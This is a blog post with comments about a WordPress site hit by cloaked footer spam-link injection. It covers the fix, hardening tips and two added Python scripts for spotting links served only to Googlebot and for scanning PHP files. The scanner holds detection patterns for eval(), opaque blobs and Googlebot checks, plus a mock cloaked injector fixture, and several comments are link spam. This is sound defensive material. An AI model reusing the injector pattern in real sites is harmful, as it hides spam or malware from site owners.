Has Your WordPress Blog Been Hacked?


If you own a WordPress blog, you may have been hacked, but what’s worse, you may not even know that you have been exploited.

This happened to me recently, and today I want to ensure that every WordPress reader not only knows how to detect this problem, but how to fix the problem & how to protect your site from future attacks.

Ok, here is the thing… like most marketers, my technical skills are not very good, but, like most marketers, I have a lot of very useful contacts. So I contacted a good friend of mine (Paul from SEOidiot).

Paul takes up the story below:

What Happened To DeanHunt.com – By Paul

Here’s the technical side of what they did and what we did to get around it, plus a brief explanation of what I coded to try and give people the chance to check for themselves:

WordPress uses calls to wp_head and wp_footer to allow plugins to alter the content being returned as the page loads; a good example of this working well would be the SEO Title Tags plugin. However, this is the functionality that the spammers used to insert a whole raft of links into the footer.

This article [http://linux.byexamples.com/archives/397/wordpress-exploit-we-been-hit-by-hidden-spam-link-injection/] explains the technique for anyone who likes headaches, but in basic terms they are using compromised theme files or adding in new files to your compromised server which act on the wp_footer call to insert their links.

They have been even smarter than that though, as they have cloaked the links, so if you pop over to your own hacked site and view the source code you won’t see the inserted links. Only when Googlebot comes along are the links shown, which is obviously a bad thing as Google suddenly thinks you’re linking out to a bunch of parasite hosted pills sites and will give you a penalty or remove you as a result.

Note: Dean’s rankings were virtually wiped out in Google

The Solution

So how to solve this? On a dedicated box you can trawl through searching for the files known to be compromised but a simpler and easier method is to remove the wp_footer call from the footer.php file in your current theme.

There are very few plugins that do anything useful in the footer, so this made sense for Dean. If it had been the wp_head call that was inserting links we would have needed to get the host to find the dodgy files or perhaps to have moved to a clean install somewhere else.

Because it isn’t easy for people to detect when they have been hacked this way, I wrote a little tool to show people what the Google cache thinks are the links out from their page. You can find this free tool at http://www.seoidiot.co.uk/cachecheker/
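Paul’s check rests on comparing what Googlebot is served with what a browser is served. As an added example (not Dean’s or Paul’s code, and not the cachecheker tool), this Python script fetches a page twice with different User-Agent headers and reports links present only in the crawler’s copy; the sample HTML, User-Agent strings and spam.example URLs are constructed stand-ins.

```python
"""Compare the links a normal browser sees with the links Googlebot sees.

Added example (not Dean's or Paul's code). The cloaked-link injection described
above only emits the spam links when the requesting User-Agent looks like
Googlebot, so a plain "view source" in your browser shows nothing. Fetching the
same page twice with different User-Agent headers and diffing the hrefs exposes
links served only to the crawler.
"""
import urllib.request
from html.parser import HTMLParser

# Googlebot's published User-Agent string and an ordinary desktop browser string.
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0"


class _LinkCollector(HTMLParser):
    """Collects the href of every <a> tag, ignoring fragment-only links."""

    def __init__(self):
        super().__init__()
        self.links = set()

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        for name, value in attrs:
            if name == "href" and value and not value.startswith("#"):
                self.links.add(value.strip())


def extract_links(html):
    """Return the set of hrefs found in an HTML document."""
    collector = _LinkCollector()
    collector.feed(html)
    return collector.links


def links_only_for_bot(browser_html, bot_html):
    """Links present in the Googlebot response but absent from the browser one."""
    return extract_links(bot_html) - extract_links(browser_html)


def fetch(url, user_agent, timeout=15):
    """Fetch url with a chosen User-Agent (network access; not used by the demo)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, "replace")


def check_site(url):
    """Fetch a page as a browser and as Googlebot; return the cloaked links."""
    return links_only_for_bot(fetch(url, BROWSER_UA), fetch(url, GOOGLEBOT_UA))


# Constructed sample responses standing in for the two fetches: the Googlebot
# copy carries an injected block just before </body>, where wp_footer fires.
BROWSER_COPY = """<html><body><p>Post text <a href="http://example.com/friend">friend</a></p>
<a href="#top">top</a></body></html>"""
BOT_COPY = BROWSER_COPY.replace(
    "</body>",
    '<div style="display:none"><a href="http://spam.example/pills">pills</a>'
    '<a href="http://spam.example/meds">meds</a></div></body>',
)

if __name__ == "__main__":
    for link in sorted(links_only_for_bot(BROWSER_COPY, BOT_COPY)):
        print("served only to Googlebot:", link)
```

A clean result from this check is not proof of a clean site: the injector may key on the crawler’s IP range rather than the header, which is why reading the Google cache, as Paul’s tool does, is the more reliable comparison.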

Back to Dean…

So in a nutshell, your WordPress blog may have been hacked, and the usual checks won’t show anything wrong. You may only realise something is wrong once you have been booted out of Google.

I am happy to announce that my Google rankings returned within 4 days of the offending spam being removed, which just shows once more why Google are by far the king of the search world.

So how can you prevent this happening to your WordPress site?

Firstly, and perhaps most importantly, make sure your WordPress is up to date. If you remain with the latest version at all times, you stand a much better chance of never having these issues.

For the more technically minded amongst you, I got some great tips from Matt Cutts, and I hope that, considering the circumstances, Matt won’t mind me posting his tips below:

  1. Secure your /wp-admin/ directory. What I’ve done is lock down /wp-admin/ so that only certain IP addresses can access that directory. I use an .htaccess file, which you can place directly at /wp-admin/.htaccess . This is what mine looks like:

    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    order deny,allow
    deny from all
    # whitelist home IP address
    allow from 64.233.169.99
    # whitelist work IP address
    allow from 69.147.114.210
    allow from 199.239.136.200
    # IP while in Kentucky; delete when back
    allow from 128.163.2.27

    I’ve changed the IP addresses, but otherwise that’s what I use. This file says that the IP address 64.233.169.99 (and the other IP addresses that I’ve whitelisted) are allowed to access /wp-admin/, but all other IP addresses are denied access. Has this saved me from being hacked before? Yes.

  2. Make an empty wp-content/plugins/index.html file. Otherwise you leak information on which plug-ins you run. If someone wanted to hack your blog, they might be able to do it by discovering that you run an out-of-date plugin on your blog and then they could exploit that.
  3. Subscribe to the WordPress Development blog at http://wordpress.org/development/feed/ . When WordPress patches a security hole or releases a new version, they announce it on that blog. If you see a security patch released, you need to upgrade or apply the patch. You leave yourself open to being hacked if you don’t upgrade.

And here’s a bonus tip: in the header.php file for your theme, you might want to check for a line like

<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" />

I’d just go ahead and delete that line or at least the bloginfo('version'). If you’re running an older version of WordPress, anyone can view source to see what attacks might work against your blog.

Credit to Matt, Reuben and my buddy ShoeMoney. I also got a lot of assistance from David Geere from the awesome EatingBritain. Oh, and David Naylor was incredibly helpful as well. Thanks, David.

What’s Next For My WordPress Site’s Security?

Dave and I are looking to do a fresh install of WordPress, and we will also be looking into any plugins that can further assist us.

If you have any advice or tips based on the above, please leave them in the comments box. Also, send this post to any friends who have a WordPress site, I would hate for them to go through the hell that I had to suffer.

A wise man once told me: “what doesn’t kill you only makes you stronger”. Together we can ensure we are all strong enough to avoid this sort of issue in future.

Dean

  • http://www.NathanGilder.com Nathan Gilder

    Thanks for the tool, Paul – look at fixing the posted link though. Checked a few of my blogs and they’re looking okay for now.

    Dean, thanks for getting the word out. I’m digging the article.

    Current score: 0
  • http://www.connexted.com/blog Craig Dewe

    Thanks for the post and detailed explanation Dean… and glad to hear you’ve got it sorted!

    *runs off to check his blogs*

    Current score: 0
  • http://deanhunt.com Dean Hunt

    Link fixed, thanks Nathan.

    make sure you all use the free tool to check your sites.

    Current score: 0
  • http://www.steven-sanders.com Steven-Sanders

    There are a lot more things you can do as well with security, and an easier way to not display the directory structure for folders that do not contain an index file.

    Visit my site for more info:

    http://www.steven-sanders.com/establishing-a-sense-of-security-on-your-blog/

    Current score: 0
  • http://none Jo

    hi there,
    I just wonder, inside cPanel there is a feature called “Index Manager”. I found that it’s very useful; we can set “No indexing” for those folders that we don’t want Google to index.

    what do you think ?

    Current score: 0
  • http://deanhunt.com Dean Hunt

    Jo,

    Yes, that would help… I think Steven mentions something similar in his post (see above).

    Dean

    Current score: 0
  • http://www.itslingerieparadise.com Sandrine

    Thanks for sharing this with us Dean! I’ll run to my blog right away to make sure it’s OK and will tag your post on Stumble Upon too.

    Current score: 0
  • http://deanhunt.com Dean Hunt

    Many thanks,

    Joel Commm just mentioned it on his Facebook profile, and it is buzzing around Twitter as well.

    Dean

    Current score: 0
  • http://teamloxly,.com Deborah a.k.a. Loxly

    I use the Exploit Scanner plugin for WordPress found here:

    http://ocaoimh.ie/exploit-scanner/

    I was hacked in a way that they were able to insert invisible links into the last post made. They didn’t add them to any other posts, just the last one, and it included iframes that loaded malware. I had sites that didn’t just get penalized by Google, but that Google BLOCKED users completely from because they were dangerous.

    I did a clean install on all the blogs affected, then installed this plugin and run it regularly.

    Current score: 0
  • http://karmickmarketing.com Robert Fowler

    Thanks for sharing your story and the tool Dean. I also sent out a tweet on twitter referencing this post.

    You need to find new hamsters, or better crack, I reckon :)

    Current score: 0
  • http://deanhunt.com Dean Hunt

    Thanks Rob,

    You are a gent. We gotta play some golf some time.

    Dean

    Current score: 0
  • http://blogstorm.co.uk Patrick Altoft

    How about my Google Alerts solution?
    http://www.blogstorm.co.uk/how-to-use-google-alerts-to-find-out-if-your-site-gets-hacked/

    Current score: 0
  • http://deanhunt.com Dean Hunt

    Patrick,

    Interesting theory.

    My concern would be the terms used were quite niche pills, so you would need a list of 50-100 of the main ones, and inputting all of that would be time consuming.

    That said, I am sure someone can create a script to automate it.

    Dean

    Current score: 0
  • http://www.axethem.com Axethem

    There is nothing worse than showing up to your website and seeing a bunch of links to some spam site.

    Current score: 0
  • http://deanhunt.com Dean Hunt

    Very true Axethem.

    Unfortunately these were not even visible links.

    Dean

    Current score: 0
  • http://robertdobes.com Robert

    Hi Dean,

    this is exactly what happened to me several months ago. The thing was there were no links visible on the site, but after seeing my PR suddenly drop from 4 to 0 I checked the source code and there it was: a bunch of links to crappy sites. I was able to fix the problem and now I check everything on a regular basis.
    Thanks for the tool and info, it really helps.

    By the way how did you manage to get your PR back to 5 so quickly? My site has never recovered and remains PR 0.

    Current score: 0
  • http://Blogi360.com @CoachDeb

    or – instead of doing all of the above…
    you just get yourself on a more advanced blogging platform http://BLOGi360.com

    Most people don’t realize WordPress is one of the most hackable blogging platforms out there.

    Security is of utmost importance if information on your blog supports your business.

    TX 4 sharing this.
    I’ll go retweet now…

    Current score: 0
  • http://www.AskLindaPTaylor.com Linda P Taylor

    This happened to me!!! My site was hacked and was eventually blocked by Google as “evil”. Even moving it to another web address did not help. I finally moved to Typepad and am paying a fee to keep these evil doers out of my creations! Wished I had seen this blog 3 months ago!

    Pay attention everyone on WordPress!!!

    Linda P. Taylor
    http://www.LindaPTaylor.com
    Blog: http://www.AskLindaPTaylor.com

    Current score: 0
  • http://congressratings.com/ Marc Beharry

    Thanks a bunch for this dude, I know how you feel. It has happened to me several times now :(

    Current score: 0
  • Simon

    I know this may not be the correct forum for this, but can anyone help? I followed the .htaccess route above, replacing the ip with the one shown for me at http://www.whatismyip.com, and it locks me out completely. I have to use FTP to delete the file.

    Am I missing something? Any ideas?

    Current score: 0
  • http://centurycafe.com Johnny T

    Nice tips, particularly about the .htacess file in the wp-admin directory. Cheers

    Current score: 0
  • Simon

    Sorry – never mind! I copied and pasted from above, but it has “ rather than ”

    All set now.

    Current score: 0
  • http://jeffmcneill.com Jeff McNeill

    A wise man? So you spoke with Nietzsche directly?

    Current score: 0
  • http://homemadesolar.net/concentrator/ chesty

    Where is the text, urls, etc, usually stored? (I mean the dodgy ones from the attacker) In the db or in one of the files?

    If the text is stored in a file, a regular cron job to grep for keywords might be the go, otherwise if it’s in the db, it’s a little more work, but a regular db search would be handy.

    I’m interested in developing something i can run on my server automagically, rather than manually checking.

    Current score: 0
  • http://www.theadsenseidiot.com The Adsense Idiot

    I discovered yesterday when logging into wp-login that someone had hacked several of my WP blogs. These sites are all running the latest version of wordpress.

    The hackers have somehow put a line of code into wp-login.php (see below)


    Is this the same hack ?

    Thanks

    Current score: 0
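A file-side check for what Paul describes (trawling the server for the compromised files), chesty asks about (a cron job that greps for tell-tale content) and The Adsense Idiot found (an obfuscated eval blob in wp-login.php, header.php and footer.php). This is an added example, not code from the post or from any commenter; the pattern names, the wp-content default path and the two fixture files are my own constructions.

```python
"""Scan wp-content for the file-side footprints of the injection described above.

Added example, not code from the post or from any commenter. It implements the
"cron job to grep for keywords" idea from chesty's comment and looks for what
Paul and The Adsense Idiot describe: theme or plugin PHP files that register a
callback on wp_footer / wp_head, call eval(), carry a long opaque string literal
(the obfuscated blob), or branch on the User-Agent for Googlebot (the cloak).
Hits are leads to inspect, not proof: legitimate plugins hook wp_footer too.
"""
import os
import re
import sys

# Pattern names are reported in this order for every file that matches.
PATTERNS = {
    "registers a wp_footer/wp_head callback":
        re.compile(r"add_action\(\s*['\"](wp_footer|wp_head)['\"]"),
    "calls eval()": re.compile(r"\beval\s*\("),
    "long opaque string literal": re.compile(r"['\"][A-Za-z0-9+/=@]{60,}['\"]"),
    "checks User-Agent for Googlebot":
        re.compile(r"HTTP_USER_AGENT[^;]{0,200}googlebot", re.I | re.S),
}


def scan_source(source):
    """Return the names of the patterns that match one file's contents."""
    return [name for name, rx in PATTERNS.items() if rx.search(source)]


def scan_tree(root):
    """Map each matching .php path under root to the pattern names it hit."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.endswith(".php"):
                path = os.path.join(dirpath, fname)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
                if hits:
                    findings[path] = hits
    return findings


# Constructed fixtures: a normal footer.php, and one carrying a cloaked injector
# whose payload is a meaningless placeholder blob ("QUJD" repeated).
CLEAN_FOOTER = "<?php wp_footer(); ?>\n</body></html>\n"
INJECTED_FOOTER = (
    "<?php\nadd_action('wp_footer', 'show_links');\n"
    "function show_links() {\n"
    "  if (stripos($_SERVER['HTTP_USER_AGENT'], 'googlebot') !== false) {\n"
    "    eval(base64_decode('" + "QUJD" * 15 + "'));\n  }\n}\n?>\n"
)

if __name__ == "__main__":
    # Run as: python scan.py /path/to/wp-content (from cron, mailing the output)
    root = sys.argv[1] if len(sys.argv) > 1 else "wp-content"
    for path, hits in sorted(scan_tree(root).items()):
        print(path, "->", "; ".join(hits))
```

Compare each hit against a pristine copy of the same theme or plugin before deciding it is malicious; the scan narrows the search, it does not replace the clean reinstall Deborah and Dean describe.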
  • http://deanhunt.com Dean Hunt

    Adsense Idiot

    I checked my wp-login.php, and I couldn’t find anything wrong with it.

    Current score: 0
  • http://www.theadsenseidiot.com The Adsense Idiot

    Thanks Dean,

    I also found this malicious script in my theme folder in header.php and footer.php

    Thanks for your reply

    Current score: 0
  • http://www.hackerforums.org Hacker Forums

    Almost all blog hacks are from people not upgrading their blog software.

    If you don’t make a ton of changes, just back up your template one time, then create or download a script to email you a database dump every couple of days.

    http://www.hackerforums.org

    Current score: 0
  • http://www.ladyboyspattaya.com Internationalhardman

    My mate’s WordPress blog got hacked a while ago… it just redirects to some Russian search engine now. Dunno how to fix it.

    Current score: 0
  • http://wiifitforsale.weebly.com awii9667

    In different blogs, hacking can be done. Beware of this while writing your blogs.

    Current score: 0
  • http://www.unihacker.com UNiHacker

    A few tips to help bloggers stay hack free.

    #1 Backup your database once a week, or get a script to email it to you automatically.

    #2 Keep your blog software up-to-date.

    #3 Use a stronger password: 2 uppercase, 2 lowercase, 2 numbers, 2 special characters should do it.

    Spending a few minutes a week doing this can save a lot of trouble from hackers in the long run.

    Hacker Forums

    Current score: 0
  • pnda

    Well guys, thanks for your good information. I have come across a similar situation. I was searching the web to get some ideas and finally found the following link, which also has three good articles on malware problems, scanning and security…

    http://www.itoneworldsystem.com/blog/2009/01/29/how-to-scan-blogweb-site-for-malicious-codes/

    Current score: 0
  • cat

    Thanks for this post – I just checked all my WP sites using the tool you linked to, and a couple of my old WP blogs which I haven’t touched in ages do indeed have dodgy footer links. One of them is even displaying pharma-related Adsense ads! I will be more diligent about keeping all my WP sites updated from now on.

    Current score: 0
  • http://www.seo-check.dk Steen Öhman

    Very interesting post. I run 4-5 WordPress sites/blogs and always try to update my system – but still some new and useful tips here.

    I really like wordpress, but if so many people use a product – then it attracts the hackers.

    Steen Öhman
    Öhman Research – online marketing
    Denmark

    Current score: 0
  • http://www.allaboutauto.us mssmotorrd

    It’s the first time I have commented here and I must say you share genuine, quality information with bloggers! Good job.
    p.s. You have a very good template for your blog. Where did you find it?

    Current score: 0
  • http://www.whoismicheleprice.com Michele Price

    Sounds great, Dean, but didn’t you say at the beginning of the post you are not a techy? Me neither, so all that does not make any sense to me.

    Here is what I would have found helpful: a video (which is one of your favorite mediums) of how to do what he explained in text.

    I am still saying to myself HUH? Intellectually I get you need to make changes – the process is not landing for me.

    What if you have mobile wifi and travel and need to be able to access your WordPress? Doesn’t that mean you will have a different IP every time you log in? So got more questions ;) ))

    Current score: 0
  • http://alcoholrehab.com Wade

    Well I guess this just stresses why everyone needs to continually make sure all of their plugins and software are up to date.

    Current score: 0
  • http://xbox360fixx.allnewstreams.com Xbox 360 Red Ring Of Death Fix

    Hey, I actually have been following your site for a while and merely needed to congratulate you on the quality of your articles. Great work.

    Current score: 0
  • http://www.gettingfitkeepingfit.com How to Lose Weight

    Hey how are you. I found your blog through Google and I just wanted to say that I think your writing is simply stunning! Thanks again for providing this content for free.

    Regards!

    Check out my blog at How to lose weight fast

    Current score: 0
  • http://www.techdivision.com TechDivision

    Thanks for the very useful blog post. We had the same problem with our blog and it wasn’t easy to find the reason for our loss in Google rankings. This is really bad… Hopefully the ranking will return after removing the inserted links!

    Current score: 0
  • Lenore

    I came here because someone has hacked my site and is placing spam on it. My Leave a Comment section was the same as the one on this site and I was getting a lot of spam so I changed it so that you have to login to post. However, someone is still posting spam without logging in. I see this site has the same problem, the comment “How to Lose Weight,” appears to be from the same spammer. Anyone know how to block this?

    Current score: 0
  • http://www.caremorstairlifts.co.uk Karen Hird

    I am at a loss as to why my visitors have dropped off for certain keywords where I still rank number 1. Where have my visitors gone? I have changed my site to a WordPress site from Joomla and have risen in rankings, and my blogs seem to be ranking well, 6th on the first page of Google UK for my main keywords, but traffic has dropped.

    Take for example my phrase “stairlifts for the elderly”: I get no traffic now, and on my old site I was in the same position and got 134 visitors a month before, but nothing has changed in rankings. I would say I have done more blogs with different versions of the keyword (stairlift, stair lifts for the elderly), all near the top, and nothing. What is going on?

    Current score: 0
  • http://www.deandreateam.com/114518-Chandler-AZ-RESCity.aspx Chandler Homes for Sale

    Enjoyed reading

    Current score: 0
  • http://www.gossipchips.com facebook poker chips

    This is a really good site post, im delighted I came across it. Ill be back down the track to check out other posts that

    Current score: 0
  • http://ilek.pl/sitemap.php apteka internetowa gdańsk

    Here you are!

    Current score: 0
  • http://donovanlinds26.tumblr.com/ mbox 2 pro

    Check out your program code or something. There’s some browser incompatibility with your website.

    Current score: 0
  • http://www.blip.tv/file/4220812 cdj 800 used

    It will be great to learn where my wife and I are able to obtain it.

    Current score: 0
  • http://www.trade2public.co.uk/glass_safety_k_low_e.html window glass

    Hi there. Will it be ok if I go somewhat off subject? I’m trying to access the blog site on my brand-new iPad, however it won’t display correctly; do you have any kind of tips? Shall I attempt to find an upgrade for my software or something? With thanks for the support.

    Current score: 0
  • http://www.1s3y5j2l4.com Karolyn Cochran

    BestAntivirusSoftware.co.nz is New Zealand’s No.1 Absolutely free

    Current score: 0
  • http://hauntjaunts.net/blog Courtney Mroch

    What do I do if my blog was hacked? I can’t login to look at any plugins or anything. Any suggestions/advice of where to turn?

    Current score: 0